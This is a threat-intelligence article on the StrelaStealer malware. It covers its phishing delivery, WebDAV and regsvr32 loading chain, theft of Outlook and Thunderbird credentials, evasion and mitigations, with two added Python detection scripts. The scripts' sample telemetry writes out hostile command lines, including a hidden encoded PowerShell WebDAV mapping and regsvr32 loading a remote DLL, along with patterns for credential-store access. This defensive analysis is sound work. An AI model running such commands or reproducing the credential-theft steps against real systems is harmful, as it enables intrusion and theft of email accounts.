Unveiling StrelaStealer: A Sophisticated Threat to Email Security

In the ever-evolving landscape of cyber threats, a particularly insidious malware known as StrelaStealer has emerged, posing significant risks to organizations worldwide. This malicious software is specifically engineered to exfiltrate email credentials from widely used clients such as Microsoft Outlook and Mozilla Thunderbird, thereby granting attackers unauthorized access to sensitive communications and data.

Origins and Evolution

First identified in November 2022, StrelaStealer has undergone continuous development, enhancing its capabilities to evade detection and broaden its reach. Initially targeting Spanish-speaking users, the malware has expanded its scope, now affecting organizations across Europe and the United States. Countries such as Italy, Spain, Germany, and Ukraine have reported significant incidents, indicating a well-orchestrated campaign with specific targeting parameters.

Infection Mechanism

StrelaStealer employs a multi-stage infection process, primarily disseminated through large-scale phishing campaigns. These campaigns deliver ZIP archives containing obfuscated JavaScript files to unsuspecting recipients. Upon execution, the JavaScript initiates a complex attack chain:

1. Execution of JavaScript: The victim executes the JavaScript file, typically using the Windows Script Host (CScript or WScript).

2. PowerShell Command: The script spawns a PowerShell process that executes an encoded command to map a WebDAV network path.

3. DLL Payload Retrieval: Using Regsvr32, the malware remotely registers and executes a DLL payload hosted on the mapped WebDAV share.

This sophisticated delivery mechanism allows the malware to execute directly in memory, effectively bypassing many traditional detection methods.
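The three stages above leave a distinctive parent/child trail in process-creation telemetry, and that trail is something a detection team can correlate even when the DLL itself never touches disk. The script below is an added example (not code from the article or from any vendor) that walks constructed process records and alerts when a Windows Script Host process has, somewhere beneath it, both a PowerShell process whose encoded command references a WebDAV UNC path and a regsvr32 launch that loads a DLL from such a path. The record schema (`pid`, `ppid`, `image`, `cmdline`) is an assumed simplification of Sysmon Event ID 1 fields, the WebDAV host `203.0.113.10` is a documentation address, and every sample record is made up for the demonstration.

```python
"""Added example, not part of the original article: correlate the
script host -> PowerShell (WebDAV mapping) -> regsvr32 (DLL from UNC path)
chain over constructed process-creation records.

Assumed, simplified Sysmon Event ID 1 schema: pid, ppid, image, cmdline.
"""
import base64
import re
from typing import Dict, List, Optional

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# WebDAV shares are addressed as \\host@80\DavWWWRoot\... or \\host@SSL\...;
# the "@<port>" / "@SSL" marker after the host is the tell-tale.
WEBDAV_UNC = re.compile(r"\\\\[\w.-]+@(?:\d+|SSL)\\", re.IGNORECASE)

# PowerShell accepts -e, -ec, -en, -enc and the full -EncodedCommand.
ENCODED_ARG = re.compile(
    r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload (UTF-16LE under base64),
    or "" when the command line carries none or it does not decode."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def parent_chain(by_pid: Dict[int, dict], pid: int) -> List[dict]:
    """Records from the process itself up to the root, following ppid links."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain


def detect_strela_chain(records: List[dict]) -> List[dict]:
    """One alert per regsvr32 launch that completes the three-stage pattern.

    The regsvr32 may be a child of the PowerShell process or a sibling of it
    under the script host; both layouts are accepted because we only require
    that the two share a script-host ancestor.
    """
    by_pid = {r["pid"]: r for r in records}
    alerts = []
    for r in records:
        if r["image"].lower() != "regsvr32.exe" or not WEBDAV_UNC.search(r["cmdline"]):
            continue
        # Stage 1: a script host somewhere above regsvr32.
        host: Optional[dict] = next(
            (a for a in parent_chain(by_pid, r["pid"])[1:]
             if a["image"].lower() in SCRIPT_HOSTS), None)
        if host is None:
            continue
        # Stage 2: a PowerShell descendant of that same script host that
        # mapped a WebDAV path, in the clear or inside an encoded command.
        for p in records:
            if p["image"].lower() != "powershell.exe":
                continue
            if not any(a["pid"] == host["pid"] for a in parent_chain(by_pid, p["pid"])[1:]):
                continue
            decoded = decode_encoded_command(p["cmdline"])
            if WEBDAV_UNC.search(decoded) or WEBDAV_UNC.search(p["cmdline"]):
                alerts.append({
                    "script_host_pid": host["pid"],
                    "powershell_pid": p["pid"],
                    "regsvr32_pid": r["pid"],
                    "webdav_command": decoded or p["cmdline"],
                })
                break
    return alerts


# --- constructed sample telemetry ---------------------------------------
MAPPING_COMMAND = r"net use \\203.0.113.10@80\DavWWWRoot"   # constructed
ENCODED = base64.b64encode(MAPPING_COMMAND.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "explorer.exe",   "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\Downloads\invoice.js"'},
    {"pid": 300, "ppid": 200, "image": "powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"pid": 400, "ppid": 300, "image": "regsvr32.exe",
     "cmdline": r"regsvr32.exe /s \\203.0.113.10@80\DavWWWRoot\share\payload.dll"},
    # Benign: an administrator registering a local DLL from a console.
    {"pid": 500, "ppid": 1,   "image": "cmd.exe",        "cmdline": "cmd.exe"},
    {"pid": 600, "ppid": 500, "image": "regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Windows\System32\example.dll"},
]

if __name__ == "__main__":
    for alert in detect_strela_chain(SAMPLE_EVENTS):
        print(alert)
```

The benign `cmd.exe → regsvr32.exe` pair is deliberately included: regsvr32 alone is far too common to alert on, so the rule fires only when the WebDAV path and the script-host ancestry are both present.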

Technical Analysis

Upon successful execution, StrelaStealer performs extensive system reconnaissance, collecting information about the host system, installed applications, country locale, and internet connectivity. The malware specifically targets email credentials by:

– Outlook: Accessing Windows Registry keys to retrieve ‘IMAP User,’ ‘IMAP Server,’ and ‘IMAP Password’ values. The ‘IMAP Password’ is decrypted using the Windows CryptUnprotectData function before exfiltration.

– Thunderbird: Searching the ‘%APPDATA%\Thunderbird\Profiles\’ directory for ‘logins.json’ (account and password) and ‘key4.db’ (password database) files, which are then exfiltrated to the attacker’s command and control (C2) server.

The stolen credentials and system information are transmitted over unencrypted HTTP connections, allowing attackers to gain unauthorized access to victims’ email accounts.
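The two credential stores named above (the Outlook IMAP registry values and the Thunderbird `logins.json` / `key4.db` files) are normally read only by the mail clients themselves, so any other process reading them is a useful signal. The following is an added example (not code from the article or from any product) that scans constructed object-access audit records, flags readers other than `outlook.exe` and `thunderbird.exe`, and rates a process that touches both clients' stores as high confidence. The record layout (`process`, `object_type`, `path`, `user`) is an assumed simplification of Windows object-access auditing (Security Event ID 4663), which only fires once a SACL is set on the objects; the registry subkey below the Outlook profile is a labelled placeholder, since the rule keys only on the value name.

```python
"""Added example, not part of the original article: flag processes other than
the mail clients reading the Outlook IMAP registry values or the Thunderbird
logins.json / key4.db files.

Assumed record layout (simplified Security Event ID 4663 object access):
process, object_type ("file" | "registry"), path, user.
"""
import re
from typing import Dict, List, Optional

# Thunderbird profile files the malware collects.
THUNDERBIRD_STORE = re.compile(
    r"\\Thunderbird\\Profiles\\[^\\]+\\(?:logins\.json|key4\.db)$", re.IGNORECASE)

# Outlook per-account IMAP settings; the password value is DPAPI-protected,
# which is why the malware calls CryptUnprotectData on it.
OUTLOOK_IMAP_VALUES = {"imap user", "imap server", "imap password"}

# Processes expected to read each store; anything else is worth a look.
EXPECTED_READERS = {
    "thunderbird": {"thunderbird.exe"},
    "outlook": {"outlook.exe"},
}


def classify(event: dict) -> Optional[str]:
    """Return 'thunderbird', 'outlook', or None for an unrelated object."""
    if event["object_type"] == "file" and THUNDERBIRD_STORE.search(event["path"]):
        return "thunderbird"
    if event["object_type"] == "registry":
        value_name = event["path"].rsplit("\\", 1)[-1].lower()
        if value_name in OUTLOOK_IMAP_VALUES:
            return "outlook"
    return None


def detect_credential_store_access(events: List[dict]) -> List[dict]:
    """One alert per access to a credential store by an unexpected process."""
    alerts = []
    for e in events:
        store = classify(e)
        if store is None:
            continue
        proc = e["process"].rsplit("\\", 1)[-1].lower()
        if proc in EXPECTED_READERS[store]:
            continue
        alerts.append({"store": store, "process": proc,
                       "path": e["path"], "user": e["user"]})
    return alerts


def score_by_process(alerts: List[dict]) -> Dict[str, str]:
    """Rate each alerting process: both clients' stores -> 'high',
    a single store -> 'medium'."""
    stores: Dict[str, set] = {}
    for a in alerts:
        stores.setdefault(a["process"], set()).add(a["store"])
    return {p: ("high" if len(s) > 1 else "medium") for p, s in stores.items()}


# --- constructed sample audit records ------------------------------------
OUTLOOK_PW_VALUE = (r"HKCU\Software\Microsoft\Office\16.0\Outlook\Profiles"
                    r"\PLACEHOLDER_PROFILE\PLACEHOLDER_ACCOUNT\IMAP Password")
TB_LOGINS = r"C:\Users\alice\AppData\Roaming\Thunderbird\Profiles\ab12cd34.default\logins.json"
TB_KEYDB = r"C:\Users\alice\AppData\Roaming\Thunderbird\Profiles\ab12cd34.default\key4.db"

SAMPLE_EVENTS = [
    # Expected: the clients reading their own stores.
    {"process": r"C:\Program Files\Mozilla Thunderbird\thunderbird.exe",
     "object_type": "file", "path": TB_LOGINS, "user": "alice"},
    {"process": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "object_type": "registry", "path": OUTLOOK_PW_VALUE, "user": "alice"},
    # Unrelated file access: should not classify at all.
    {"process": r"C:\Windows\System32\notepad.exe",
     "object_type": "file", "path": r"C:\Users\alice\notes.txt", "user": "alice"},
    # The in-memory payload running inside regsvr32 reads all three.
    {"process": r"C:\Windows\System32\regsvr32.exe",
     "object_type": "file", "path": TB_LOGINS, "user": "alice"},
    {"process": r"C:\Windows\System32\regsvr32.exe",
     "object_type": "file", "path": TB_KEYDB, "user": "alice"},
    {"process": r"C:\Windows\System32\regsvr32.exe",
     "object_type": "registry", "path": OUTLOOK_PW_VALUE, "user": "alice"},
]

if __name__ == "__main__":
    found = detect_credential_store_access(SAMPLE_EVENTS)
    for a in found:
        print(a)
    print(score_by_process(found))
```

Because the DLL runs in memory inside the `regsvr32.exe` host from the delivery chain, the reader that shows up here is regsvr32 itself, which is why a hit from that image on either store deserves immediate triage.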

Evasion Techniques

StrelaStealer employs several sophisticated techniques to evade detection:

– Obfuscation: The malware implements multi-layer obfuscation and code-flow flattening to complicate analysis.

– Locale Verification: Before proceeding with data exfiltration, the malware verifies the system’s locale by reading the ‘Locale’ value under the ‘Control Panel\International’ registry key and comparing it against predefined values for the targeted countries.

– Dynamic API Resolution: The malware uses dynamic API resolution to obscure its activities further.

These evasion techniques demonstrate the threat actor’s commitment to stealth and operational security.

Attribution and Threat Actor

Security researchers have attributed StrelaStealer to a threat actor group designated as HIVE-0145, active since late 2022. This group is believed to operate as a financially motivated initial access broker, potentially serving as the sole operator behind StrelaStealer deployments. The identification of the threat actor provides valuable context for understanding the malware’s objectives and operational patterns.

Mitigation Strategies

Given the sophisticated nature of StrelaStealer, organizations are advised to implement comprehensive security measures:

– Email Security: Deploy advanced email filtering solutions to detect and block phishing attempts.

– User Education: Conduct regular training sessions to educate employees about the risks of phishing and the importance of verifying email attachments.

– Endpoint Protection: Utilize endpoint detection and response (EDR) solutions to monitor and respond to suspicious activities.

– Regular Updates: Ensure that all software, especially email clients, is up to date with the latest security patches.

By adopting these strategies, organizations can enhance their resilience against StrelaStealer and similar threats.

Conclusion

StrelaStealer represents a significant advancement in malware sophistication, combining stealthy infection mechanisms with targeted credential theft. Its evolution and expansion underscore the persistent and evolving nature of cyber threats. Organizations must remain vigilant, continuously updating their security protocols and educating their workforce to mitigate the risks posed by such advanced malware campaigns.